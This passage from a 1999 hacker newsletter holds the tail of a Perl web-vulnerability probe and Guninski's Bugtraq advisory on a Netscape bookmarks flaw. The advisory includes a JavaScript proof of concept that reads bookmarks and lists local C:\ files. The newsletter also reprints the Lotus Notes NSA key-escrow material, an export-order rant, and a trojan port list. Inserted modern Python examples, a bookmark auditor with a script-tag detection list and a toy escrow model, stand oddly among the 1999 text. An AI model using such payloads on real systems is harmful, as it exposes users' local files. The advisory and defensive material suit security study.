$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!"); $proto = getprotobyname('tcp') || &error("Unable to get protocall!"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: 
$!"); connect(SOCK, $paddr) || &error("Unable to connect: $!"); send(SOCK,$submit,0); $check=; ($http,$code,$blah) = split(/ /,$check); if($code == 200) { print "Found!\n"; print LOG "Found!\n" if $log==1; $bad_security++; } else { print "Not Found\n"; print LOG "Not Found\n" if $log==1; } close(SOCK); } sub error { $error = shift(@_); print "Error - $error\n"; print LOG "Error - $error\n\n" if $log==1; close(LOG) if $log==1; exit; } @HWA 16.0 Vulnerability in Netscape bookmarks found by George Guninski... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 16 May 1999 17:17:34 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator bookmarks security vulnerability There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title. If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file - the bookmarks file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known, but it is easily guessed for most dialup users. Vulnerabilities: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows). Workaround: Disable JavaScript or do not bookmark untrusted pages. Demonstration is available at: http://www.nat.bg/~joro/book2.html See attached file for the source. 
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski

--------------------------------------------------------------------------
<http://www.nat.bg/~joro/book2.html>

<HTML><HEAD>
<TITLE>
<SCRIPT>
alert('Bookmarks got control');
s='Here are some bookmarks: \n';
for(i=1;i<7;i++) s += document.links[i]+'\n';
alert(s);
dirToRead='wysiwyg://2/file://c:/';
a=window.open(dirToRead);
s='Here are some files in C:\\ :\n';
for(i=1;i<7;i++) s += a.document.links[i]+'\n';
a.close();
alert(s);
</SCRIPT>

There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with Javascript code in the title.
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known - easily guessed for most dialup users.

Vulnerability: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows).
Workaround: Disable JavaScript or do not bookmark untrusted pages.



To test it:
1) Bookmark this page.
2) Close all NC windows and restart NC.
3) Open bookmarks file (change the filename in the field below if needed and click "Open bookmarks", or use File| Open Page... )

Enter the file name of your bookmarks file:
Open bookmarks
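The post shows the payload side; the defender's counterpart is to check whether a stored bookmarks file already carries active content, since the bug only fires from what Navigator wrote to disk. The following audit script is an added example, not from Guninski's post or from Netscape. It walks a Netscape-style bookmarks.html as a token stream and reports every script-like tag together with the bookmark entry it sits inside. The sample file is constructed to mimic the Netscape 4 layout; a clean bookmarks file contains no such tags, so any hit warrants a look before the file is opened in a browser with JavaScript enabled.

```python
"""Audit a Netscape-style bookmarks.html for stored active content.

Added example (not from the Bugtraq post).  The sample below is a
constructed bookmarks file: the second entry's title is a <SCRIPT> block,
which is what bookmarking a page with script in its <TITLE> leaves behind.
"""
from html.parser import HTMLParser

SAMPLE_BOOKMARKS = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks</H1>
<DL><p>
    <DT><A HREF="http://www.example.com/" ADD_DATE="926800000">Example site</A>
    <DT><A HREF="http://evil.example/page.html" ADD_DATE="926800001"><SCRIPT>alert('Bookmarks got control')</SCRIPT></A>
</DL><p>
"""

# Tags that should never appear inside a bookmark title; "script" is the one
# the post describes, the others are included for the same local-file reason.
ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}


class BookmarkAuditor(HTMLParser):
    """Record every active-content tag and the A HREF entry enclosing it."""

    def __init__(self):
        super().__init__()
        self.current_href = None   # href of the bookmark currently open
        self.findings = []         # list of (href, tag)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so HREF matches here.
        if tag == "a":
            self.current_href = dict(attrs).get("href")
        elif tag in ACTIVE_TAGS:
            self.findings.append((self.current_href, tag))

    def handle_endtag(self, tag):
        if tag == "a":
            self.current_href = None


def audit_bookmarks(text):
    """Return [(href, tag), ...] for each active-content tag found."""
    parser = BookmarkAuditor()
    parser.feed(text)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for href, tag in audit_bookmarks(SAMPLE_BOOKMARKS):
        print(f"<{tag}> stored inside bookmark for {href}")
```

Because the check parses the file rather than running it, it is safe to run on a live bookmarks file; entries it flags can be deleted with a text editor before the browser ever renders the file, which is the practical form of the "do not bookmark untrusted pages" workaround after the fact.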
@HWA

17.0 Lotus Notes in bed with the NSA on encryption keys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)

http://www.wired.com/news/print_version/politics/story/19602.html?wnpg=all

Spying on the Spies
by Niall McKay
12:15 p.m. 10.May.99.PDT

The National Security Agency has its ear to the world, but doesn't listen to everyone at once.

That was one conclusion of a new report, Interception Capabilities 2000, accepted late last week by the European Parliament's Science and Technology Options Assessment Panel (STOA). The panel commissioned Duncan Campbell, a British investigative reporter, to prepare a report on Echelon, the US-led satellite surveillance network.

"I have no objection to these systems monitoring serious criminals and terrorists," said Glyn Ford, a British Labour Party member of parliament and a committee member of STOA. "But what is missing here is accountability, clear guidelines as to who they can listen to, and in what circumstances these laws apply."

Campbell was asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US hands.

"What is new and important about this report is that it contains the first ever documentary evidence of the Echelon system," said Campbell.

Campbell obtained the document from a source at Menwith Hill, the principal NSA communications monitoring station, located near Harrogate in northern England.

The report details how intelligence agencies intercept Internet traffic and digital communications, and includes screen shots of traffic analysis from NSA computer systems.

Interception Capabilities 2000 also provides an account of a previously unknown, secret international organization led by the FBI.
According to Campbell, the "secret" organization, called ILETS (International Law Enforcement Telecommunications Seminar), is working on building backdoor wiretap capabilities into all forms of modern communications, including satellite communications systems.

"[The report] is undoubtedly the most comprehensive look at Echelon to date because of its attention to detail -- [and] the NSA's use of technology," said John Young, a privacy activist in New York.

Although the United States has never officially acknowledged Echelon's existence, dozens of investigative reports over the past decade have revealed a maze-like system that can intercept telephone, data, cellular, fax, and email transmissions sent anywhere in the world.

Previously, Echelon computers were thought to be able to scan millions of telephone lines and faxes for keywords such as "bomb" and "terrorist." But Campbell's report maintains that the technologies to perform such a global dragnet do not exist. Instead, Campbell said that the system targets the communications networks of known diplomats, criminals, and industrialists of interest to the intelligence community.

The report charges that popular software programs such as Lotus Notes and Web browsers include a "back door," through which the NSA can gain access to an individual's personal information.

Citing a November 1997 story in the Swedish newspaper, Svenska Dagbladet, the report said that "Lotus built in an NSA 'help information' trapdoor to its Notes system, as the Swedish government discovered to its embarrassment."

The report goes on to describe a feature called a "workfactor reduction field" that is built into Notes and incorporated into all email sent by non-US users of the system. The feature reportedly broadcasts 24 of the 64 bits of the key used for each communication, and relies on a public key that can only be read by the NSA.

Lotus could not be reached for comment.
The new report emerges as politicians on both sides of the Atlantic are growing increasingly concerned about Echelon and its capabilities.

"I believe that it's time that there is some congressional scrutiny of the Echelon project and I am examining a way to do that," said Representative Bob Barr (R-Georgia). "I understand the need for secrecy -- I was with the CIA myself -- but Echelon has raised some questions about fundamental policy and constitutional rights."

Barr is concerned that the NSA is using its Echelon partners to help it sidestep laws that forbid the US government from spying on its own people.

So far, there has been very little scrutiny of spy systems in the United States, according to Patrick Poole, a privacy advocate and lecturer in government and economics at Bannock Burn College in Franklin, Tennessee.

"The only significant examination of spy systems in the United States was the Church Report, which was prompted by Watergate in the early '70s," said Poole. "I hope that Europe's interest in the Echelon system will spark some new debate in the US."

Echelon is believed to be principally operated by the NSA and its British counterpart, the Government Communications Headquarters. The system also reportedly relies on agreements with similar agencies in other countries, including Canada's Communications Security Establishment, Australia's Defense Signals Directorate, and New Zealand's Government Communications Security Bureau.

(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)

Hello,

1st off please don't publish my name on your site. I'm too lazy to set up another cheezy mail acct. Today I downloaded cryptography/nsa/lotus.notes.backdoor.txt from your site. I have a close friend who is a developer for Iris (the people who make Notes for lotus.)
I sent him the file I downloaded and asked him what the deal was, and here's his response:

Here's the necessary info to truly understand the issue here; a speech by Ray Ozzie and Charlie Kaufman's white paper on the topic.

What it comes down to is that notes provides superior exportable encryption technology when compared to other US products on the market. For anyone (but the NSA) to crack our international encryption keys they must crack a 64 bit key, the same as with a US encryption key. In the international version we take 24 of the 64 bit encryption key and encrypt the 24 bits with the NSA's public key and send it, encrypted strongly, along with the encrypted message. This means the NSA can decrypt with their key and have 24 of the 64 bit key. They still have to break the remaining 40 bits. 40 bit key encryption has been the max for exportable encryption and that is what all other US exportable encryption providers allow. That limit has just been raised to 56 bits and we are incorporating that as I type.

In the worst case: the NSA's private key is compromised, the 40 bit portion of the key still must be cracked. So we haven't weakened the security of international encryption, but actually made it equal to the US security (to everyone but the NSA).

We are proud of this arrangement because we have found a way to make Notes as secure as the US government will allow for our international customers. If we hadn't used this technique all of the international notes encrypted data would be with only a 40 bit key. As it stands, the 64 bit key used in both US and international encryption is extremely secure.

It's too bad the author of this article chose to attack Lotus Notes without considering the options the US government provides. We could have just shipped 40 bit encryption like MS, Netscape, etc. and leave our international customers with weak encryption but we didn't.

Oh well, you can't make everyone understand this confusing and frustrating stuff.
I hope this helps.

-

*** Prepared Remarks of Ray Ozzie,
*** President of Iris Associates
*** an affiliate of Lotus Development Corporation
*** Delivered at opening of the RSA Data Security Conference '96
***

SAN FRANCISCO, Jan. 17, 1996 -- As we're all painfully aware, the U.S. government continues to maintain that cryptography should be classified and controlled as a munition of war -- and for good historical reason: Some of cryptography's finest hours have been during past wars.

From the government's standpoint, the export controls implied by munitions classification must be working very well, since there has been no mass-deployed worldwide cryptography, most general communications is still in cleartext, and no world of unbreakable crypto has emerged.

In the meantime, while we're preoccupied by protecting the flow of bits across borders, trouble is brewing. Criminals don't recognize borders but operate in one wild-and-woolly network. Crackers are able to attack targets halfway around the world with no fear of prosecution. Exceptionally smart people in Eastern Europe crack financial systems in New York. Everywhere you look, bright, clever people are breaking into communication systems, industrial control systems, transportation systems, health care systems -- anything and everything that's controlled by networked computers.

And as you know, this isn't a theoretical problem, or just a problem with clever people stealing money from banks; it's a "clear and present danger" that's a direct result of our having moved into the information age without adequately securing our information and our global information systems. This is not just an issue of signals Intelligence or of Title III wiretaps or of lost software industry profits; this is a public safety issue. One of these days, someone is going to bring down an airliner somewhere in the world, or cause a train wreck, or destabilize an economy, by breaking into an information system through the worldwide net.
And it may be something that we could have prevented, if we had been making more casual and widespread use of cryptography.

And that's why I, and a number of you, spend so much time trying to change the system -- trying to educate, to help convince the U.S. Government to liberalize export controls, to allow our customers worldwide to have access to good security, to protect themselves against the threats present on the worldwide networks.

To be sure, the customers are getting more and more astute. Due in large part to the press surrounding the cracking of a few 40-bit RC4 keys last year, our customers have lost confidence in 40-bit crypto. They told us that, if we were going to continue to market 40-bit Lotus Notes overseas, we should stop marketing it as a secure system -- that we should start to call it "data scrambling" or "data masking" instead of encryption.

And so we have continued to lobby, arguing that the benefits of substantially better exportable crypto outweigh the risks. The government's response? Well, their latest proposal might -- in theory -- allow us to ship a 64-bit product overseas so long as it had third-party key escrow features built in.

We talked to our customers about the administration's proposal, and the answer was very clear: our customers have said a resounding "no" to key escrow in Lotus Notes. They simply don't like the notion that they can't compute the additional risk and liability introduced by a third party holding the keys to unlock their data.

Well, that left us in a bind. We need to provide better security for our international customers, but the government's proposal was clearly unacceptable to them. And because I didn't see a "silver bullet" solution -- or general export relief -- in the cards, I began looking for an interim solution that might allow us to ship a more secure product in the short term, while we continued to argue for substantial revision of national cryptography policy.
And after months of negotiation, I'm here to announce that we have found a short-term workaround to the problem, which I hope you will find to be an interesting, new development in the area of cryptography as it pertains to export controls.

While this is a very tough issue, and while I personally believe that a world of widespread cryptography is truly inevitable, the name of the game right now is to find a compromise solution that satisfies the stated needs of the U.S. Government, while still providing good information security. This is just such a compromise.

Lotus Notes Release 4, which is now shipping, utilizes a new method of security that we're referring to as "Differential Workfactor Cryptography." It is a conceptually simple solution that addresses two problems at the same time: First, it protects sensitive corporate information from most malicious crackers far more effectively than previously exported products; second, it permits the government to retain its current level of access to encrypted information carried by U.S. products overseas. No more access, no less access.

As you know, the U.S. government has defined its "maximum tolerance level" for exportable unescrowed cryptography at 40 bits. That is, because they generally permit the export of 40-bit products, the U.S. government is clearly already willing to deal with a 40-bit work factor in order to examine encrypted communications outside of this country.

So, the system that we're shipping in Lotus Notes Release 4 overseas is one that presents different work factors to different parties, hence the name. Against crackers -- against the run-of-the-mill adversary trying to break a message -- the work factor is 64 bits, just like it is in the U.S. That is, in the new International Edition of Lotus Notes, bulk data keys are now 64 bits just as they are in our North American Edition that's sold in the U.S. and Canada. But when the U.S. Government needs access to a communications stream overseas encoded by the international edition of Lotus Notes, they are no worse off - and no better off - than they are today - they have to crack 40 bits.

So how can this be true, when the work factor is 64 bits for non-governmental adversaries? It's pretty simple. We asked the government to generate a special RSA key pair, and to make known their RSA Public Key. We asked them to keep their private key classified, compartmentalized -- as secret as they'd keep the keys to their own military and diplomatic communication systems -- and to never disclose it to anyone. Then, we changed Notes so that whenever the product generates an encrypted 64-bit bulk data key, bound to that key is a small package -- a "workfactor reduction field" -- containing 24 bits of the bulk data key encrypted with the U.S. government's public key. So the U.S. government has exclusive access to 24 of the 64 bits. That's 64 bits against the cracker, 40 bits for the government.

And, of course, this version of Notes is fully interoperable with the North American Edition of Notes, the only version that we sell in the United States. In the North American Edition, as always, keys generated for communications within the U.S. and Canada aren't subject to any kind of work factor reduction. And both the North American Edition and the International Edition are shipping today.

We are very pleased that we are now able to offer this increased level of security to our overseas customers. And I encourage you out there -- product designers and developers who are in a similar bind -- to offer stronger confidentiality features to your customers in your exported products by taking advantage of our already having negotiated export approval for this Differential Workfactor implementation.

But please make no mistake about it: We fully recognize that this is a compromise solution. This is not a panacea. This is not the "silver bullet" that addresses all needs.
We continue to argue vigorously that global and national economic security, domestic law enforcement related to Information security crimes, and personal privacy concerns would all be served well by the rapid and broad, worldwide proliferation of good, strong, high-grade cryptography. And we continue to push for a complete and public review of national cryptography policy.

But we relish the fact that, in today's highly-charged political climate surrounding the issue of cryptography, we were able to negotiate a solution that increases information security for our worldwide customers. By throwing another potential solution into the mix -- by leading the way for others by clearing its export approval -- we hope that this stirs debate related to national cryptography policy. A debate that is both global and local in nature; a debate that, with your help, we can hopefully bring to the attention of the U.S Public.

Updated: 01/17/96 01:14:15 PM

***
*** White Paper by Charlie Kaufman, distributed at the RSA '96 conference
***

Differential Workfactor Cryptography

Charlie Kaufman
Security Architect
Iris Associates
January 17, 1996

Abstract:

This document describes the technical approach behind the exportable strong cryptography included in Lotus Notes Release 4 (International Edition). Current U.S. export regulations generally prohibit the export of cryptographic software that uses keys larger than 40 bits, but advances in processor technology make 40 bit keys breakable by exhaustive search practical for a growing collection of potential attackers. In a novel scheme we sometimes refer to as 64/40, we provide the cryptographic strength of 64 bit keys against most attackers while to comply with export regulations we make the workfactor for breaking the system equivalent to only 40 bits for the U.S. government. We do that by encrypting 24 of the 64 bits under a public RSA key provided by the U.S. government and binding the encrypted partial key to the encrypted data.
Background:

As we're all painfully aware, the U.S. government continues to maintain that cryptography should be classified and controlled as a munition of war. There is a long historical basis for this - some of cryptography's finest hours have been during the wars of the past. And while some would argue that export controls are a sham because many foreign governments impose no such restrictions and we participate in an international marketplace, by one very important measure export controls have been a success: no mass-deployed worldwide cryptography has emerged and most general communications is still in cleartext.

But while the government has been successfully defending its ability to spy, trouble has been brewing. Criminals don't recognise borders - there's only one wild and woolly network. Crackers are able to attack targets halfway around the world with no fear of prosecution. Smart people in Eastern Europe crack financial systems in New York. Everywhere you look, bright clever people are breaking into communication systems, industrial control systems, transportation systems, health care systems, anything and everything that's controlled by networked computers. This is not a theoretical problem, or just a problem with clever people stealing money from banks; it's a clear and present danger that's a direct result of the fact that we've moved into the information age without adequately securing our global information systems.

Lotus Notes has been a pioneer in providing transparent strong RSA based cryptography in its product offering. It went to great lengths to provide the strongest protection legally permissible. There is an International Edition that complies with export regulations and a domestic edition that does not (called the North American Edition because it is legally available in the U.S. and Canada).
In the International Edition, users use two RSA key pairs - one used to protect data integrity and authentication and another (shorter) one to protect data confidentiality because only data confidentiality key sizes are regulated by export controls. Full interoperability between the North American and International Editions is achieved by having the two ends negotiate down to the largest key size that both ends support. This design came at no small cost, but it was the only way we could deliver the best security possible to each of our customers given the existing regulatory climate.

Differential Workfactor Cryptography is another innovation in the direction of giving our customers the best security we can while continuing to oppose the regulations that make the complexity necessary.

How it works:

The idea behind Differential Workfactor Cryptography is simple; whenever a bulk data key is created, a 64 bit random number is chosen. If the use of that key is one involving data confidentiality and the International Edition of Notes, 24 of the bits are encrypted under a public RSA key that was provided to us by the U.S. government and the result - called a Workfactor Reduction Field - is bound into the encrypted data. There is no Workfactor Reduction Field in data used only by the domestic edition of Notes, and there is none for keys that are not used for data confidentiality (e.g. those used for authentication).

If an attacker wanted to break into a Notes system based on information obtained by eavesdropping, he would have to exhaustively search a 64 bit key space. Even the U.S. government would face this workfactor because there is no Workfactor Reduction Field in keys used for authentication. An attacker who wanted to read an encrypted document that was either read from a server or eavesdropped from the wire would face a 64 bit workfactor. But if the U.S. government needed to decrypt such a document it could obtain 24 of the bits using its private key and the Workfactor Reduction Field and then exhaustively search a 40 bit key space.

Tamper resistance:

You might wonder what's to prevent someone from deleting the Workfactor Reduction Field from a document or the setup protocol of a network connection. This is similar to the problem faced in the Clipper design to assure that the LEAF field was not removed from a conversation. In a software only implementation, it is not possible to prevent tampering entirely. The easiest form of tampering would be to smuggle the North American Edition CD out of the U.S. or pass it to someone over the Internet. The best a software implementation can do in terms of tamper resistance is to make it impossible to remove the Workfactor Reduction Field without modifying both the source of the data and the destination. This can be done by having the destination check for the presence of the Workfactor Reduction Field and refuse to decrypt the data if it is not there or not correct. The destination can't decrypt the Workfactor Reduction Field to check it, but knowing the bulk data key and the government public key, it can regenerate the WRF and compare the result with the supplied value. RSA has the convenient property that the same value encrypted twice produces the same result; it would be somewhat more complex (but still possible) to duplicate this functionality with other public key algorithms.

[Note: for this to work, the random pad that was used in creating the WRF must be delivered to the recipient of the message. For it to be secure, it must be delivered encrypted since a clever attacker who knew the pad could do 2^24 trial encryptions to get 24 bits of the key and then do 2^40 trial decryptions to recover the rest.]
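The "How it works" and "Tamper resistance" sections above describe the 64/40 scheme in prose; the toy model below puts the three roles side by side so the workfactor arithmetic and the recipient's regenerate-and-compare check can be seen running. It is an added example for this section, not Lotus or Iris code, and it makes assumptions the paper leaves open: the 24 disclosed bits are taken to be the top 24 of the 64-bit key, the "government" key pair is textbook RSA built from two small fixed primes (constructed for the demo and far too small for real use), and the random pad that the paper's closing note says a secure deployment needs is omitted, so this shows the structure of the scheme rather than a secure instantiation.

```python
"""Toy model of Differential Workfactor Cryptography (the 64/40 scheme).

Added example, not Lotus/Iris code.  Textbook (unpadded) RSA over small
constructed primes so it runs offline; the paper's random pad is omitted.
"""
import secrets

# --- the escrow-side RSA key pair (constructed for the demo, NOT real) -----
P, Q = 104729, 104723                 # two small primes; modulus ~2^33
N = P * Q                             # large enough to hold a 24-bit value
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))     # private exponent: held by the key holder only
GOV_PUBLIC = (N, E)                   # shipped inside the product
GOV_PRIVATE = (N, D)                  # never shipped (the paper says Lotus never had it)

KEY_BITS = 64        # bulk data key size in both editions
WRF_BITS = 24        # bits disclosed through the Workfactor Reduction Field


def rsa_apply(value, key):
    n, exp = key
    return pow(value, exp, n)


def make_bulk_key():
    """Fresh 64-bit bulk data key, as generated per message."""
    return secrets.randbits(KEY_BITS)


def make_wrf(bulk_key, gov_public):
    """Workfactor Reduction Field: 24 bits of the key (assumed here to be the
    top 24) encrypted under the government public key.  Deterministic RSA is
    what lets the recipient regenerate and compare it."""
    top24 = bulk_key >> (KEY_BITS - WRF_BITS)
    return rsa_apply(top24, gov_public)


def recipient_check(bulk_key, wrf, gov_public):
    """Destination side: refuse to decrypt unless a WRF is present and equals
    the one regenerated from the key the recipient already holds."""
    return wrf is not None and make_wrf(bulk_key, gov_public) == wrf


def government_recover(wrf, gov_private):
    """Key-holder side: decrypt the WRF to learn 24 of the 64 key bits."""
    return rsa_apply(wrf, gov_private)


def remaining_workfactor(known_bits):
    """Exhaustive-search space left once known_bits of the key are disclosed."""
    return 2 ** (KEY_BITS - known_bits)


def demo():
    key = make_bulk_key()
    wrf = make_wrf(key, GOV_PUBLIC)
    recovered = government_recover(wrf, GOV_PRIVATE)
    return {
        "recovered_bits_match": recovered == key >> (KEY_BITS - WRF_BITS),
        "recipient_accepts": recipient_check(key, wrf, GOV_PUBLIC),
        "recipient_accepts_stripped": recipient_check(key, None, GOV_PUBLIC),
        "recipient_accepts_forged": recipient_check(key, (wrf + 1) % N, GOV_PUBLIC),
        "cracker_workfactor": remaining_workfactor(0),        # 2**64
        "government_workfactor": remaining_workfactor(WRF_BITS),  # 2**40
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two failure modes the paper discusses fall out of `recipient_check`: a stripped WRF is rejected because it is absent, and a forged one because regeneration under the public key does not reproduce it. What the check cannot do is stop a sender and receiver who both run modified software, which is exactly the limit the paper states for a software-only implementation; and the FAQ's point that compromise of the single government private key collapses the International Edition to 40-bit strength corresponds here to anyone holding `GOV_PRIVATE` reaching the `2**40` search.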
Frequently Asked Questions:

Q: Does this mean that the International Edition of Lotus Notes Release 4 is just as secure as the North American Edition against someone who does not know the U.S. Government's key?

A: Almost. There are factors other than the 64 and 40 bit secret keys. The International Edition is still limited to 512 bit RSA keys when they are used for data confidentiality. The North American Edition uses 630 bit RSA keys in this context. While 512 bit RSA keys are considerably more secure than 40 bit secret keys, they are not as secure as 64 bit keys, so in both cases it would be more cost effective to attack the RSA keys than to attack the secret keys. In considering the security of the International Edition, users must also assess the likelihood that an attacker might learn the government's private key either by breaking through the government's protective mechanisms or by breaking the single RSA key. If either were to happen, the International Edition would become only as secure as other 40 bit products.

Q: Does Lotus also have a copy of the private key used to reduce the workfactor from 64 to 40 bits?

A: No. The U.S. government generated the RSA key and supplied us with the public component. We never had access to the private component (which made debugging this thing a real joy!).

Q: How is this scheme different from Key Escrow?

A: While one goal may be the same - to provide exportable strong cryptography - there are differences with respect to security, functionality, and administrative convenience. It is more secure than Key Escrow in that even if third parties misbehave, there remains a substantial workfactor in breaking each individual message. It may be more or less secure than Key Escrow depending on the policies of the holder of the U.S. government key compared to the policies of possible Key Escrow agents. It is less functional than some Key Escrow proposals because it is impractical to use this facility to recover lost keys.
And it is more administratively convenient than key escrow because there is no communication with third parties necessary as part of setup. Notes is secure 'out of the box'.

Q: Does this scheme address law enforcement concerns within the U.S. (i.e. should it be considered an alternative to Clipper)?

A: No. In only one way does this scheme address the Law Enforcement interests of either U.S. or foreign governments: better information security helps Law Enforcement to guard against information-related crimes. As indicated by our continuing to go to considerable expense to maintain both domestic and international editions, we continue to oppose any limits on domestic use of strong cryptography.

@HWA

18.0 Packetstorm Security Gets the choke order for .yu sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

execorder.txt - Last week, I received a copy of an "Executive Order" from The White House, signed by President Clinton, along with several emails informing me that it is now illegal for me to "provide any software or technology to Yugoslavia and Montenegro". In other words, I was told that I need to restrict access to this web site so that anybody from the .yu TLD could not access and download "exploits" and "hacker tools". It was suggested that I deny access to anybody using proxies, anonymizers, non-resolvable IP addresses, and of course anybody from Yugoslavia. This is absurd.

Here is my "Executive Reply" to President Clinton:

Fuck you and your stupid orders, Bill.
THE WHITE HOUSE
Office of the Press Secretary
________________________________________________________________________

For Immediate Release May 1, 1999

EXECUTIVE ORDER
- - - - - - -

BLOCKING PROPERTY OF THE GOVERNMENTS OF THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO), THE REPUBLIC OF SERBIA, AND THE REPUBLIC OF MONTENEGRO, AND PROHIBITING TRADE TRANSACTIONS INVOLVING THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO) IN RESPONSE TO THE SITUATION IN KOSOVO

By the authority vested in me as President by the Constitution and the laws of the United States of America, including the International Emergency Economic Powers Act (IEEPA) (50 U.S.C. 1701 et seq.), the National Emergencies Act (50 U.S.C. 1601 et seq.), and section 301 of title 3, United States Code, I, WILLIAM J. CLINTON, President of the United States of America, in order to take additional steps with respect to the continuing human rights and humanitarian crisis in Kosovo and the national emergency described and declared in Executive Order 13088 of June 9, 1998, hereby order:

Section 1. Amendment to Executive Order 13088.

(a) Section 1(a) of Executive Order 13088 of June 9, 1998, is revised to read as follows:

"Section 1. (a) Except to the extent provided in section 203(b) of IEEPA (50 U.S.C. 1702(b)), and in regulations, orders, directives, or licenses that may hereafter be issued pursuant to this order, all property and interests in property of the Governments of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Republic of Serbia, and the Republic of Montenegro that are in the United States, that hereafter come within the United States, or that are or hereafter come within the possession or control of United States persons, including their overseas branches, are hereby blocked."

(b) Section 2 of Executive Order 13088 is hereby revoked, and a new section 2 is added to read as follows:

"Sec. 2. Except to the extent provided in section 203(b) of IEEPA (50 U.S.C.
1702(b)) and in regulations, orders, directives, or licenses that may hereafter be issued pursuant to this order, and notwithstanding any contract entered into or any license or permit granted prior to the effective date of this order, the following are prohibited:

"(a) the exportation, reexportation, sale, or supply, directly or indirectly, from the United States, or by a United States person, wherever located, to the Federal Republic of Yugoslavia (Serbia and Montenegro) or the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro, of any goods (including petroleum and petroleum products), software, technology (including technical data), or services;

"(b) the importation into the United States, directly or indirectly, of any goods, software, technology (including technical data), or services from the Federal Republic of Yugoslavia (Serbia and Montenegro) or owned or controlled by the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro; and

"(c) any transaction or dealing by a United States person, wherever located, in goods, software, technology (including technical data), or services, regardless of country of origin, for exportation, reexportation, sale, or supply to, or exportation from or by, the Federal Republic of Yugoslavia (Serbia and Montenegro) or the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro. This prohibition includes, without limitation, purchase, sale, transport, swap, or brokerage transactions in such items, and approving, financing, insuring, facilitating, or guaranteeing any such transactions."

(c) Section 4 of Executive Order 13088 is revised to read as follows:

"Sec. 4.
Any transaction by a United States person that evades or avoids, or has the purpose of evading or avoiding, or attempts to violate, any of the prohibitions set forth in this order is prohibited. Any conspiracy formed to violate the prohibitions of this order is prohibited."

(d) Section 7 of Executive Order 13088 is revised to read as follows:

"Sec. 7. (a) The Secretary of the Treasury, in consultation with the Secretary of State, shall give special consideration to the circumstances of the Government of the Republic of Montenegro and persons located in and organized under the laws of the Republic of Montenegro in the implementation of this order.

"(b) The Secretary of the Treasury, in consultation with the Secretary of State, shall give special consideration to the humanitarian needs of refugees from Kosovo and other civilians within the Federal Republic of Yugoslavia (Serbia and Montenegro) in the implementation of this order.

"(c) The Secretary of the Treasury, in consultation with the Secretary of State, is hereby directed to authorize commercial sales of agricultural commodities and products, medicine, and medical equipment for civilian end use in the territory of the Federal Republic of Yugoslavia (Serbia and Montenegro) under appropriate safeguards to prevent diversion to military, paramilitary, or political use by the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro."

Sec. 2. Preservation of Authorities. Nothing in this order is intended to affect the continued effectiveness of any rules, regulations, orders, licenses, or other forms of administrative action issued, taken, or continued in effect heretofore or hereafter under the authority of IEEPA, except as hereafter terminated, modified, or suspended by the issuing Federal agency.

Sec. 3. No rights or privileges conferred.
Nothing contained in this order shall confer any substantive or procedural right or privilege on any person or organization, enforceable against the United States, its agencies or its officers.

Sec. 4. (a) Effective date. This order is effective at 12:01 a.m. eastern daylight time on May 1, 1999.

(b) Transmittal; Publication. This order shall be transmitted to the Congress and published in the Federal Register.

WILLIAM J. CLINTON

THE WHITE HOUSE,
April 30, 1999.

# # #

@HWA

19.0 Common Trojans and the ports they can be found on
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml

After seeing several questions about traffic directed at ports such as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on.

port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
